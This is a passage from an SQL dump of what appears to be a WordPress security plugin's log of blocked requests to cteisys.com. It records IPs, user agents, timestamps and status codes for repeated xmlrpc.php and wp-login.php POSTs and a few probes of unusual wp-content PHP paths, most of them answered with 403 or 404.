(Java\\/1.8.0_161)\"}','6MSRWezJIZt87QX3LCYUnwTy',0,1664434707.3535,438,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','haweY5oQAULEcx8MHyRkG1l3',0,1664434709.1570,457,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','2iS3KcIGtzAJsrEjXwMYbO4H',0,1664434710.1564,463,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','fy0PCNDkzn4iedUlQGwa8R7B',0,1664434711.0165,503,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','6YmgF5RQs9hHwtlcMXEJoGrb',0,1664434711.9222,496,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','MOjAG3qfKc0pBLVX86ZoYF4k',0,1664434712.9231,450,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','mp3Q18F05eZrS9uEhi7yBxNG',0,1664434715.9381,460,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','QhF1tukGOH6xJiDaeL2RybBd',0,1664434720.0131,465,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','2jYzx0Tdb89aX6Sc3FPJpGL4',0,1664434721.2348,342,'','POST',403,0,515,0,1,'',0),('165.22.89.6',2769705222,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SWKTrJscGnXqIiQNORALFy1t',0,1664434725.1779,553,'','POST',403,0,515,0,1,'',0),('141.98.102.235',2372036331,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','f6P3rkXdiJ2lWbK8C0eFUqRc',0,1664434778.6991,1242,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','hAgvl0xcIzeo7RSrPmKYQ9Va',0,1664434840.7866,2307,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','ugqj8a3TSt4PEDcBQKzC9GvY',0,1664434842.8011,1426,'','POST',403,0,515,0,1,'',0),('89.46.106.142',1496214158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vPVBepqaixJsdNZmhK0DC4Yj',0,1664434843.2890,1075,'','POST',403,0,515,0,1,'',0),('103.163.138.21',1738770965,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1iO3ZuBdAPafkYpX5g8ycjbV',0,1664434848.0820,1472,'','POST',403,0,515,0,1,'',0),('142.93.36.53',2388468789,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JUBlDICa2spV9ycAHv8FnGWM',0,1664434864.6841,13277,'','POST',403,0,515,0,1,'',0),('81.88.52.20',1364734996,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','MINj9qxBp71OrlKuvst5C84Q',0,1664434860.4025,17560,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','6DTo9lUu3t7LzwI2HcgSjbZa',0,1664434868.4881,9479,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','aqD9hRe72nVTyNcP3wH1KsUC',0,1664434892.1314,781,'','POST',403,0,515,0,1,'',0),('82.223.120.85',1390377045,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gG73CjIr9DmKLAoNHanYwpTS',0,1664434893.0217,551,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1azGWTZvHR4MEjq3dODKhQu5',0,1664434895.4624,588,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','5ZIhfEeXlFDGJMVkB83W0Apo',0,1664434901.4078,534,'','POST',403,0,515,0,1,'',0),('192.99.56.116',3227727988,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HGcfPwganuLE0MRdjkXA9tBS',0,1664435136.0381,2514,'','POST',403,0,515,0,1,'',0),('194.163.156.168',3265502376,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ljgYJ4DtPSbT8wh2eiRHAVyu',0,1664435446.9298,18235,'','POST',403,0,515,0,1,'',0),('199.249.223.130',3355041666,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wjE8vVFa6NDqIy29YK03nhgx',0,1664435508.1976,10259,'','POST',403,0,515,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mb2j8NDfBOVyuqdtkoWP1UZv',0,1664435524.1630,528,'','POST',403,0,515,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B5KGbEP41zouerFMWqY38vfR',0,1664435838.7447,19104,'','POST',403,0,515,0,1,'',0),('120.79.8.125',2018445437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w93PXHRC1EvWUAYGjFOQSItJ',0,1664435937.3115,1286,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ezhxA4VvmKY9PuyGbCpaZgO7',0,1664436274.1663,18431,'','POST',403,0,515,0,1,'',0),('103.129.178.69',1736553029,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ze7nd4OUPpWIKD6N21oBJFc5',0,1664436673.2683,19521,'','POST',403,0,515,0,1,'',0),('207.148.118.130',3482613378,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xtLj7oCBSd820NQERZl1m5ik',0,1664436779.5598,1478,'','POST',403,0,515,0,1,'',0),('205.185.117.143',3451483535,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','TcNSrt1ylYQULnV8K6jFahbJ',0,1664437158.7163,11035,'','POST',403,0,600,0,1,'',0),('216.250.116.85',3640292437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cdHxr8o6aSmB1EA5XVN4yjZv',0,1664437201.5429,2652,'','POST',403,0,515,0,1,'',0),('87.248.153.52',1475909940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zFoTk4rqiL3VIgOG1clXYv9C',0,1664437568.5853,18515,'','POST',403,0,515,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JDxmCPAlvqgpucEXBsnHfy6I',0,1664437654.6120,1399,'','POST',403,0,515,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jaLiD06udytGFs3JNB2KpXTE',0,1664437990.0534,18928,'','POST',403,0,515,0,1,'',0),('5.101.157.241',90545649,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JbXenI6PrlhjS5mATiYH0M2G',0,1664438089.4833,8004,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','Cj6q3VbYvUrPuaB75Gnf0K2A',0,1664438216.0433,4863,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','SrCR2M6ZzQ8d9JwVAT4evNOG',0,1664438217.3308,4301,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','8nIyudAM7Bar1Ct4WFT65PEN',0,1664438232.7824,758,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','FEalctjuBHiWDOZm1LwCx9rP',0,1664438241.6307,782,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','7H8Ll9MxzYUuJtc4iIFESqgn',0,1664438245.4139,500,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','OTx46wknJzBbHhUIsPr7Nqo9',0,1664438324.5516,1609,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','Fdngib9Jxrf0Rh4GAzuWY1Lq',0,1664438331.8307,676,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','WcgZRkF3qPdxonSi0eBOV2Mf',0,1664438333.1517,521,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','s5E8iIwS4VW2LnAoqDjYC1rH',0,1664438334.3893,575,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','IkQL263Uezu8tKjVqAMD5vOf',0,1664438335.5227,542,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','Dp6Us3v9Fq1wJGl2ec4AyMTu',0,1664438337.4336,470,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','NXv75M93JHYl2nomzSbyWThL',0,1664438338.4837,424,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','8IODmd2jK4JEGMNzcvfw0rhk',0,1664438339.4133,419,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','mnH4WCvUa7VqczXg2wQbKTEA',0,1664438340.2103,400,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','83hSOlNxI9vWBjbT41f0kgHw',0,1664438341.0152,420,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','2Fw4p1gTRZuQ65EozWxdsBAV',0,1664438342.1400,475,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','UxG4aRivfdZzW5BojTJqsObN',0,1664438342.9930,450,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','2EykdZnraNR1Qt9gvBMLw3Po',0,1664438344.9556,431,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','wtUW5gfO1bhpcmZHG03qrBzD',0,1664438345.8438,417,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','Y0AjcTUdJmxwgsH3oB5S2q6i',0,1664438346.7590,493,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','ZpRjsPr5eV6YBcTxgMlD7Etq',0,1664438347.7687,332,'','POST',403,0,515,0,1,'',0),('213.187.11.137',3585805193,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OraYIQXFebu68AqWj0pNnB9P',0,1664438861.3223,18228,'','POST',403,0,515,0,1,'',0),('177.52.160.32',2973016096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O7PfI5FaCvo4BrdeWSj6UXEl',0,1664438989.8781,1665,'','POST',403,0,515,0,1,'',0),('212.83.147.15',3562246927,'','http://cteisys.com/wp-content/wp-file-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','cqDA6rdltYwTCXSJ7NhU0kBP',0,1664439202.1891,11308,'','GET',403,0,700,0,1,'',0),('212.83.147.15',3562246927,'','http://cteisys.com/wp-content/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','YFdeBQg0qKW3J4MhE1RlnaPV',0,1664439288.0000,288,'','GET',403,0,700,0,1,'',0),('212.83.147.15',3562246927,'','http://cteisys.com/wp-content/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','neD3aFTR0pobjdNOZSvcVBkz',0,1664439341.0432,12062,'','GET',403,0,700,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','A8Iga2zpvjCT3fSi4oYq7h6H',0,1664439349.6273,6434,'','POST',403,0,600,0,1,'',0),('157.245.59.110',2650094446,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aE4MG2tOZP5sR7LT9zoWfDlj',0,1664439416.5102,2306,'','POST',403,0,515,0,1,'',0),('192.163.195.60',3231957820,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8PEKQrf4CjTFy93huqZxYSlv',0,1664439776.4748,6337,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','T8iazOsFdQXprhc0fI3t2CjK',0,1664439880.1448,1365,'','POST',403,0,515,0,1,'',0),('46.183.216.163',783800483,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Mt7kxSwEzsvLuUTDlbIXn8pJ',0,1664440299.6683,19434,'','POST',403,0,515,0,1,'',0),('167.71.184.141',2806495373,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','XKVN5jlcCbhdpWTQfrgIH9ty',0,1664440381.1444,1445,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','SEyoIP1iR7k0Z6HjhfNtp53Q',0,1664440383.6316,522,'','POST',403,0,515,0,1,'',0),('185.107.113.101',3110826341,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','BjgXmzJyPVZi9sIEMQ6KpfNL',0,1664440391.2018,527,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','ocFm5alCdZuQEgPK7139TiSN',0,1664440397.1500,573,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','jlRn45ds1BbKzuQvat8GiSCw',0,1664440398.8727,481,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','2QqnB9OMyuvlKbNaId8PifJE',0,1664440427.7351,1664,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','FYdw8f1oROQvhzeqJlP2jX6K',0,1664440436.8438,1280,'','POST',403,0,515,0,1,'',0),('75.119.215.101',1266145125,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','4wt32eGmPSrdA6FhxBVU1Ib7',0,1664440439.3169,486,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','HUZ23K7sQzEOp6qX9IrtSckJ',0,1664440445.9352,558,'','POST',403,0,515,0,1,'',0),('104.194.10.231',1757547239,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ybd1IlgK6qzJiEHtXUcjxOBT',0,1664440790.8277,1445,'','POST',403,0,515,0,1,'',0),('66.175.217.71',1118820679,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dCOXlWAyzp0DkEN8S2cmV4ot',0,1664441232.9503,18700,'','POST',403,0,515,0,1,'',0),('207.244.246.140',3488937612,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','x5dJu6HW2Rv7st3GZAmaL0kj',0,1664441342.4953,1418,'','POST',403,0,515,0,1,'',0),('172.105.49.155',2892575131,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ZWrJq2XadC7Aumky9Qnxl4Rp',0,1664441345.3470,1073,'','POST',403,0,515,0,1,'',0),('185.93.165.224',3109922272,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','CeaW0gQtdKMifvk4Awr75GpF',0,1664441345.8041,929,'','POST',403,0,515,0,1,'',0),('198.46.81.40',3324924200,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','uRhdICJBXQoN5A4YVFPUvxqS',0,1664441348.6837,535,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','vV81jHQoeBdwXI24bJZEqU7R',0,1664441350.2534,752,'','POST',403,0,515,0,1,'',0),('128.199.54.204',2160539340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','GDonKQbMz4vRfLC6V1lPSBdc',0,1664441351.1073,546,'','POST',403,0,515,0,1,'',0),('82.180.138.212',1387563732,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','SJoAlEHCDGhpgc3jif0O8sX2',0,1664441352.7447,492,'','POST',403,0,515,0,1,'',0),('142.132.157.224',2391055840,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','hWwdtmVlaeDFCJNTqXpSQ2sz',0,1664441361.5359,488,'','POST',403,0,515,0,1,'',0),('217.21.77.74',3642051914,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','lMa0i9tqyjGkmDr2hWoEKIw6',0,1664441365.7470,503,'','POST',403,0,515,0,1,'',0),('13.126.36.87',226370647,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LH10utaP5MxC6AOoyhG8eq2v',0,1664441600.6774,1747,'','POST',403,0,515,0,1,'',0),('207.148.118.130',3482613378,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CDeKGwUHqL7n2utzBfkE60FO',0,1664441709.0213,18146,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','bD0xYJAdCSizWj8g9vNuk1PH',0,1664441891.6500,1275,'','POST',403,0,600,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YcU0RtV17rg2pzL3Ny5ChDdF',0,1664442059.7840,1397,'','POST',403,0,515,0,1,'',0),('178.124.210.118',2994524790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 